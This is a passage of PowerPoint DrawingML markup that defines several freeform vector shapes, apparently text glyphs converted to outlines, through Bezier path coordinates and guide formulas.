                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="2" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="147"/>
                    <a:pt x="39" y="138"/>
                    <a:pt x="40" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="46" y="27"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="135" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="4"/>
                    <a:pt x="119" y="0"/>
                    <a:pt x="113" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="0"/>
                    <a:pt x="89" y="6"/>
                    <a:pt x="90" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="97" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="136"/>
                    <a:pt x="99" y="147"/>
                    <a:pt x="113" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="147"/>
                    <a:pt x="128" y="138"/>
                    <a:pt x="128" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="135" y="2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98" name="Freeform 939">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5155912A-023F-4539-B0D4-47B0E41E750E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId115"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2652713" y="2351088"/>
              <a:ext cx="20638" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 62 w 62"/>
                <a:gd name="T1" fmla="*/ 32 h 215"/>
                <a:gd name="T2" fmla="*/ 31 w 62"/>
                <a:gd name="T3" fmla="*/ 0 h 215"/>
                <a:gd name="T4" fmla="*/ 0 w 62"/>
                <a:gd name="T5" fmla="*/ 31 h 215"/>
                <a:gd name="T6" fmla="*/ 31 w 62"/>
                <a:gd name="T7" fmla="*/ 63 h 215"/>
                <a:gd name="T8" fmla="*/ 62 w 62"/>
                <a:gd name="T9" fmla="*/ 32 h 215"/>
                <a:gd name="T10" fmla="*/ 62 w 62"/>
                <a:gd name="T11" fmla="*/ 184 h 215"/>
                <a:gd name="T12" fmla="*/ 31 w 62"/>
                <a:gd name="T13" fmla="*/ 153 h 215"/>
                <a:gd name="T14" fmla="*/ 0 w 62"/>
                <a:gd name="T15" fmla="*/ 184 h 215"/>
                <a:gd name="T16" fmla="*/ 31 w 62"/>
                <a:gd name="T17" fmla="*/ 215 h 215"/>
                <a:gd name="T18" fmla="*/ 62 w 62"/>
                <a:gd name="T19" fmla="*/ 1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15">
                  <a:moveTo>
                    <a:pt x="62" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="13"/>
                    <a:pt x="47" y="0"/>
                    <a:pt x="31" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="16"/>
                    <a:pt x="0" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="50"/>
                    <a:pt x="15" y="63"/>
                    <a:pt x="31" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="63"/>
                    <a:pt x="62" y="47"/>
                    <a:pt x="62" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="62" y="184"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="166"/>
                    <a:pt x="47" y="153"/>
                    <a:pt x="31" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="153"/>
                    <a:pt x="0" y="168"/>
                    <a:pt x="0" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="202"/>
                    <a:pt x="15" y="215"/>
                    <a:pt x="31" y="215"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="215"/>
                    <a:pt x="62" y="200"/>
                    <a:pt x="62" y="18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99" name="Freeform 940">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0F0A3A0-5BF9-41A6-999E-4B30B371AEA9}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId116"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2720976" y="2295526"/>
              <a:ext cx="60325" cy="174625"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 105 w 177"/>
                <a:gd name="T1" fmla="*/ 67 h 499"/>
                <a:gd name="T2" fmla="*/ 172 w 177"/>
                <a:gd name="T3" fmla="*/ 11 h 499"/>
                <a:gd name="T4" fmla="*/ 177 w 177"/>
                <a:gd name="T5" fmla="*/ 6 h 499"/>
                <a:gd name="T6" fmla="*/ 167 w 177"/>
                <a:gd name="T7" fmla="*/ 0 h 499"/>
                <a:gd name="T8" fmla="*/ 71 w 177"/>
                <a:gd name="T9" fmla="*/ 63 h 499"/>
                <a:gd name="T10" fmla="*/ 71 w 177"/>
                <a:gd name="T11" fmla="*/ 176 h 499"/>
                <a:gd name="T12" fmla="*/ 51 w 177"/>
                <a:gd name="T13" fmla="*/ 228 h 499"/>
                <a:gd name="T14" fmla="*/ 4 w 177"/>
                <a:gd name="T15" fmla="*/ 244 h 499"/>
                <a:gd name="T16" fmla="*/ 0 w 177"/>
                <a:gd name="T17" fmla="*/ 250 h 499"/>
                <a:gd name="T18" fmla="*/ 8 w 177"/>
                <a:gd name="T19" fmla="*/ 255 h 499"/>
                <a:gd name="T20" fmla="*/ 70 w 177"/>
                <a:gd name="T21" fmla="*/ 299 h 499"/>
                <a:gd name="T22" fmla="*/ 71 w 177"/>
                <a:gd name="T23" fmla="*/ 324 h 499"/>
                <a:gd name="T24" fmla="*/ 71 w 177"/>
                <a:gd name="T25" fmla="*/ 423 h 499"/>
                <a:gd name="T26" fmla="*/ 95 w 177"/>
                <a:gd name="T27" fmla="*/ 478 h 499"/>
                <a:gd name="T28" fmla="*/ 167 w 177"/>
                <a:gd name="T29" fmla="*/ 499 h 499"/>
                <a:gd name="T30" fmla="*/ 177 w 177"/>
                <a:gd name="T31" fmla="*/ 493 h 499"/>
                <a:gd name="T32" fmla="*/ 169 w 177"/>
                <a:gd name="T33" fmla="*/ 488 h 499"/>
                <a:gd name="T34" fmla="*/ 106 w 177"/>
                <a:gd name="T35" fmla="*/ 445 h 499"/>
                <a:gd name="T36" fmla="*/ 105 w 177"/>
                <a:gd name="T37" fmla="*/ 421 h 499"/>
                <a:gd name="T38" fmla="*/ 105 w 177"/>
                <a:gd name="T39" fmla="*/ 316 h 499"/>
                <a:gd name="T40" fmla="*/ 85 w 177"/>
                <a:gd name="T41" fmla="*/ 269 h 499"/>
                <a:gd name="T42" fmla="*/ 46 w 177"/>
                <a:gd name="T43" fmla="*/ 250 h 499"/>
                <a:gd name="T44" fmla="*/ 105 w 177"/>
                <a:gd name="T45" fmla="*/ 186 h 499"/>
                <a:gd name="T46" fmla="*/ 105 w 177"/>
                <a:gd name="T47" fmla="*/ 67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7" h="499">
                  <a:moveTo>
                    <a:pt x="105" y="67"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="47"/>
                    <a:pt x="118" y="15"/>
                    <a:pt x="172" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="11"/>
                    <a:pt x="177" y="9"/>
                    <a:pt x="177" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="0"/>
                    <a:pt x="173" y="0"/>
                    <a:pt x="167" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="0"/>
                    <a:pt x="72" y="26"/>
                    <a:pt x="71" y="63"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="71" y="176"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="196"/>
                    <a:pt x="71" y="212"/>
                    <a:pt x="51" y="228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="243"/>
                    <a:pt x="15" y="244"/>
                    <a:pt x="4" y="244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="245"/>
                    <a:pt x="0" y="247"/>
                    <a:pt x="0" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="255"/>
                    <a:pt x="3" y="255"/>
                    <a:pt x="8" y="255"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="40" y="257"/>
                    <a:pt x="64" y="275"/>
                    <a:pt x="70" y="299"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="305"/>
                    <a:pt x="71" y="306"/>
                    <a:pt x="71" y="324"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="71" y="423"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="444"/>
                    <a:pt x="71" y="459"/>
                    <a:pt x="95" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="493"/>
                    <a:pt x="148" y="499"/>
                    <a:pt x="167" y="499"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="499"/>
                    <a:pt x="177" y="499"/>
                    <a:pt x="177" y="493"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="488"/>
                    <a:pt x="174" y="488"/>
                    <a:pt x="169" y="488"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="137" y="486"/>
                    <a:pt x="113" y="470"/>
                    <a:pt x="106" y="445"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="440"/>
                    <a:pt x="105" y="439"/>
                    <a:pt x="105" y="421"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="316"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="105" y="293"/>
                    <a:pt x="101" y="285"/>
                    <a:pt x="85" y="269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="74" y="259"/>
                    <a:pt x="60" y="254"/>
                    <a:pt x="46" y="250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="238"/>
                    <a:pt x="105" y="215"/>
                    <a:pt x="105" y="186"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="105" y="6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00" name="Freeform 941">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE569A88-D91C-4E45-9F84-47E2680FCA11}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId117"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2816226" y="2317751"/>
              <a:ext cx="46038" cy="50800"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 45 w 135"/>
                <a:gd name="T1" fmla="*/ 27 h 147"/>
                <a:gd name="T2" fmla="*/ 24 w 135"/>
                <a:gd name="T3" fmla="*/ 0 h 147"/>
                <a:gd name="T4" fmla="*/ 1 w 135"/>
                <a:gd name="T5" fmla="*/ 27 h 147"/>
                <a:gd name="T6" fmla="*/ 8 w 135"/>
                <a:gd name="T7" fmla="*/ 129 h 147"/>
                <a:gd name="T8" fmla="*/ 24 w 135"/>
                <a:gd name="T9" fmla="*/ 147 h 147"/>
                <a:gd name="T10" fmla="*/ 39 w 135"/>
                <a:gd name="T11" fmla="*/ 129 h 147"/>
                <a:gd name="T12" fmla="*/ 45 w 135"/>
                <a:gd name="T13" fmla="*/ 27 h 147"/>
                <a:gd name="T14" fmla="*/ 134 w 135"/>
                <a:gd name="T15" fmla="*/ 27 h 147"/>
                <a:gd name="T16" fmla="*/ 112 w 135"/>
                <a:gd name="T17" fmla="*/ 0 h 147"/>
                <a:gd name="T18" fmla="*/ 89 w 135"/>
                <a:gd name="T19" fmla="*/ 27 h 147"/>
                <a:gd name="T20" fmla="*/ 96 w 135"/>
                <a:gd name="T21" fmla="*/ 129 h 147"/>
                <a:gd name="T22" fmla="*/ 112 w 135"/>
                <a:gd name="T23" fmla="*/ 147 h 147"/>
                <a:gd name="T24" fmla="*/ 127 w 135"/>
                <a:gd name="T25" fmla="*/ 129 h 147"/>
                <a:gd name="T26" fmla="*/ 134 w 135"/>
                <a:gd name="T27" fmla="*/ 2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147">
                  <a:moveTo>
                    <a:pt x="45" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="4"/>
                    <a:pt x="30" y="0"/>
                    <a:pt x="24" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="0"/>
                    <a:pt x="0" y="6"/>
                    <a:pt x="1" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="8" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="136"/>
                    <a:pt x="10" y="147"/>
                    <a:pt x="24" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="147"/>
                    <a:pt x="38" y="138"/>
                    <a:pt x="39" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="45" y="27"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="134" y="27"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="4"/>
                    <a:pt x="118" y="0"/>
                    <a:pt x="112" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="0"/>
                    <a:pt x="88" y="6"/>
                    <a:pt x="89" y="27"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="96" y="129"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="136"/>
                    <a:pt x="98" y="147"/>
                    <a:pt x="112" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="147"/>
                    <a:pt x="127" y="138"/>
                    <a:pt x="127" y="129"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="134" y="2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01" name="Freeform 942">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5991E831-F1E7-42F9-AF01-B929B9B0E982}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId118"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2889251" y="2349501"/>
              <a:ext cx="82550" cy="117475"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 101 w 239"/>
                <a:gd name="T1" fmla="*/ 132 h 334"/>
                <a:gd name="T2" fmla="*/ 54 w 239"/>
                <a:gd name="T3" fmla="*/ 83 h 334"/>
                <a:gd name="T4" fmla="*/ 101 w 239"/>
                <a:gd name="T5" fmla="*/ 32 h 334"/>
                <a:gd name="T6" fmla="*/ 149 w 239"/>
                <a:gd name="T7" fmla="*/ 82 h 334"/>
                <a:gd name="T8" fmla="*/ 101 w 239"/>
                <a:gd name="T9" fmla="*/ 132 h 334"/>
                <a:gd name="T10" fmla="*/ 57 w 239"/>
                <a:gd name="T11" fmla="*/ 150 h 334"/>
                <a:gd name="T12" fmla="*/ 101 w 239"/>
                <a:gd name="T13" fmla="*/ 162 h 334"/>
                <a:gd name="T14" fmla="*/ 184 w 239"/>
                <a:gd name="T15" fmla="*/ 82 h 334"/>
                <a:gd name="T16" fmla="*/ 171 w 239"/>
                <a:gd name="T17" fmla="*/ 39 h 334"/>
                <a:gd name="T18" fmla="*/ 200 w 239"/>
                <a:gd name="T19" fmla="*/ 30 h 334"/>
                <a:gd name="T20" fmla="*/ 219 w 239"/>
                <a:gd name="T21" fmla="*/ 47 h 334"/>
                <a:gd name="T22" fmla="*/ 239 w 239"/>
                <a:gd name="T23" fmla="*/ 27 h 334"/>
                <a:gd name="T24" fmla="*/ 203 w 239"/>
                <a:gd name="T25" fmla="*/ 0 h 334"/>
                <a:gd name="T26" fmla="*/ 150 w 239"/>
                <a:gd name="T27" fmla="*/ 17 h 334"/>
                <a:gd name="T28" fmla="*/ 101 w 239"/>
                <a:gd name="T29" fmla="*/ 2 h 334"/>
                <a:gd name="T30" fmla="*/ 19 w 239"/>
                <a:gd name="T31" fmla="*/ 82 h 334"/>
                <a:gd name="T32" fmla="*/ 35 w 239"/>
                <a:gd name="T33" fmla="*/ 129 h 334"/>
                <a:gd name="T34" fmla="*/ 25 w 239"/>
                <a:gd name="T35" fmla="*/ 163 h 334"/>
                <a:gd name="T36" fmla="*/ 37 w 239"/>
                <a:gd name="T37" fmla="*/ 199 h 334"/>
                <a:gd name="T38" fmla="*/ 0 w 239"/>
                <a:gd name="T39" fmla="*/ 261 h 334"/>
                <a:gd name="T40" fmla="*/ 116 w 239"/>
                <a:gd name="T41" fmla="*/ 334 h 334"/>
                <a:gd name="T42" fmla="*/ 232 w 239"/>
                <a:gd name="T43" fmla="*/ 261 h 334"/>
                <a:gd name="T44" fmla="*/ 198 w 239"/>
                <a:gd name="T45" fmla="*/ 204 h 334"/>
                <a:gd name="T46" fmla="*/ 125 w 239"/>
                <a:gd name="T47" fmla="*/ 190 h 334"/>
                <a:gd name="T48" fmla="*/ 90 w 239"/>
                <a:gd name="T49" fmla="*/ 190 h 334"/>
                <a:gd name="T50" fmla="*/ 76 w 239"/>
                <a:gd name="T51" fmla="*/ 189 h 334"/>
                <a:gd name="T52" fmla="*/ 60 w 239"/>
                <a:gd name="T53" fmla="*/ 182 h 334"/>
                <a:gd name="T54" fmla="*/ 54 w 239"/>
                <a:gd name="T55" fmla="*/ 164 h 334"/>
                <a:gd name="T56" fmla="*/ 57 w 239"/>
                <a:gd name="T57" fmla="*/ 150 h 334"/>
                <a:gd name="T58" fmla="*/ 116 w 239"/>
                <a:gd name="T59" fmla="*/ 304 h 334"/>
                <a:gd name="T60" fmla="*/ 29 w 239"/>
                <a:gd name="T61" fmla="*/ 261 h 334"/>
                <a:gd name="T62" fmla="*/ 49 w 239"/>
                <a:gd name="T63" fmla="*/ 226 h 334"/>
                <a:gd name="T64" fmla="*/ 102 w 239"/>
                <a:gd name="T65" fmla="*/ 218 h 334"/>
                <a:gd name="T66" fmla="*/ 203 w 239"/>
                <a:gd name="T67" fmla="*/ 261 h 334"/>
                <a:gd name="T68" fmla="*/ 116 w 239"/>
                <a:gd name="T69" fmla="*/ 304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 h="334">
                  <a:moveTo>
                    <a:pt x="101" y="132"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="132"/>
                    <a:pt x="54" y="109"/>
                    <a:pt x="54" y="83"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="54"/>
                    <a:pt x="76" y="32"/>
                    <a:pt x="101" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="32"/>
                    <a:pt x="149" y="56"/>
                    <a:pt x="149" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="149" y="111"/>
                    <a:pt x="127" y="132"/>
                    <a:pt x="101" y="132"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="57" y="150"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="151"/>
                    <a:pt x="77" y="162"/>
                    <a:pt x="101" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="162"/>
                    <a:pt x="184" y="126"/>
                    <a:pt x="184" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="67"/>
                    <a:pt x="179" y="53"/>
                    <a:pt x="171" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="33"/>
                    <a:pt x="193" y="31"/>
                    <a:pt x="200" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="44"/>
                    <a:pt x="214" y="47"/>
                    <a:pt x="219" y="47"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="47"/>
                    <a:pt x="239" y="41"/>
                    <a:pt x="239" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="15"/>
                    <a:pt x="230" y="0"/>
                    <a:pt x="203" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="0"/>
                    <a:pt x="173" y="0"/>
                    <a:pt x="150" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="12"/>
                    <a:pt x="124" y="2"/>
                    <a:pt x="101" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="2"/>
                    <a:pt x="19" y="40"/>
                    <a:pt x="19" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="104"/>
                    <a:pt x="28" y="120"/>
                    <a:pt x="35" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="137"/>
                    <a:pt x="25" y="148"/>
                    <a:pt x="25" y="163"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="181"/>
                    <a:pt x="32" y="193"/>
                    <a:pt x="37" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="222"/>
                    <a:pt x="0" y="256"/>
                    <a:pt x="0" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="304"/>
                    <a:pt x="52" y="334"/>
                    <a:pt x="116" y="334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="334"/>
                    <a:pt x="232" y="303"/>
                    <a:pt x="232" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="232" y="243"/>
                    <a:pt x="223" y="218"/>
                    <a:pt x="198" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="201"/>
                    <a:pt x="170" y="190"/>
                    <a:pt x="125" y="190"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="90" y="190"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="190"/>
                    <a:pt x="80" y="190"/>
                    <a:pt x="76" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="189"/>
                    <a:pt x="66" y="189"/>
                    <a:pt x="60" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="175"/>
                    <a:pt x="54" y="165"/>
                    <a:pt x="54" y="164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="162"/>
                    <a:pt x="55" y="155"/>
                    <a:pt x="57" y="150"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="116" y="304"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="66" y="304"/>
                    <a:pt x="29" y="283"/>
                    <a:pt x="29" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="252"/>
                    <a:pt x="33" y="236"/>
                    <a:pt x="49" y="226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="218"/>
                    <a:pt x="66" y="218"/>
                    <a:pt x="102" y="218"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="218"/>
                    <a:pt x="203" y="218"/>
                    <a:pt x="203" y="261"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="283"/>
                    <a:pt x="166" y="304"/>
                    <a:pt x="116" y="30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02" name="Freeform 943">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5CAE3AB-B90C-49BC-8045-9EE9D112C85B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId119"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2976563" y="2351088"/>
              <a:ext cx="85725" cy="76200"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 172 w 249"/>
                <a:gd name="T1" fmla="*/ 199 h 218"/>
                <a:gd name="T2" fmla="*/ 192 w 249"/>
                <a:gd name="T3" fmla="*/ 215 h 218"/>
                <a:gd name="T4" fmla="*/ 229 w 249"/>
                <a:gd name="T5" fmla="*/ 215 h 218"/>
                <a:gd name="T6" fmla="*/ 249 w 249"/>
                <a:gd name="T7" fmla="*/ 200 h 218"/>
                <a:gd name="T8" fmla="*/ 229 w 249"/>
                <a:gd name="T9" fmla="*/ 185 h 218"/>
                <a:gd name="T10" fmla="*/ 207 w 249"/>
                <a:gd name="T11" fmla="*/ 185 h 218"/>
                <a:gd name="T12" fmla="*/ 207 w 249"/>
                <a:gd name="T13" fmla="*/ 21 h 218"/>
                <a:gd name="T14" fmla="*/ 187 w 249"/>
                <a:gd name="T15" fmla="*/ 0 h 218"/>
                <a:gd name="T16" fmla="*/ 150 w 249"/>
                <a:gd name="T17" fmla="*/ 0 h 218"/>
                <a:gd name="T18" fmla="*/ 130 w 249"/>
                <a:gd name="T19" fmla="*/ 16 h 218"/>
                <a:gd name="T20" fmla="*/ 150 w 249"/>
                <a:gd name="T21" fmla="*/ 31 h 218"/>
                <a:gd name="T22" fmla="*/ 172 w 249"/>
                <a:gd name="T23" fmla="*/ 31 h 218"/>
                <a:gd name="T24" fmla="*/ 172 w 249"/>
                <a:gd name="T25" fmla="*/ 137 h 218"/>
                <a:gd name="T26" fmla="*/ 116 w 249"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 77 w 249"/>
                <a:gd name="T29" fmla="*/ 155 h 218"/>
                <a:gd name="T30" fmla="*/ 77 w 249"/>
                <a:gd name="T31" fmla="*/ 21 h 218"/>
                <a:gd name="T32" fmla="*/ 57 w 249"/>
                <a:gd name="T33" fmla="*/ 0 h 218"/>
                <a:gd name="T34" fmla="*/ 20 w 249"/>
                <a:gd name="T35" fmla="*/ 0 h 218"/>
                <a:gd name="T36" fmla="*/ 0 w 249"/>
                <a:gd name="T37" fmla="*/ 16 h 218"/>
                <a:gd name="T38" fmla="*/ 20 w 249"/>
                <a:gd name="T39" fmla="*/ 31 h 218"/>
                <a:gd name="T40" fmla="*/ 42 w 249"/>
                <a:gd name="T41" fmla="*/ 31 h 218"/>
                <a:gd name="T42" fmla="*/ 42 w 249"/>
                <a:gd name="T43" fmla="*/ 158 h 218"/>
                <a:gd name="T44" fmla="*/ 113 w 249"/>
                <a:gd name="T45" fmla="*/ 218 h 218"/>
                <a:gd name="T46" fmla="*/ 172 w 249"/>
                <a:gd name="T47" fmla="*/ 19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9" h="218">
                  <a:moveTo>
                    <a:pt x="172" y="199"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="173" y="215"/>
                    <a:pt x="183" y="215"/>
                    <a:pt x="192" y="215"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="229" y="215"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="237" y="215"/>
                    <a:pt x="249" y="215"/>
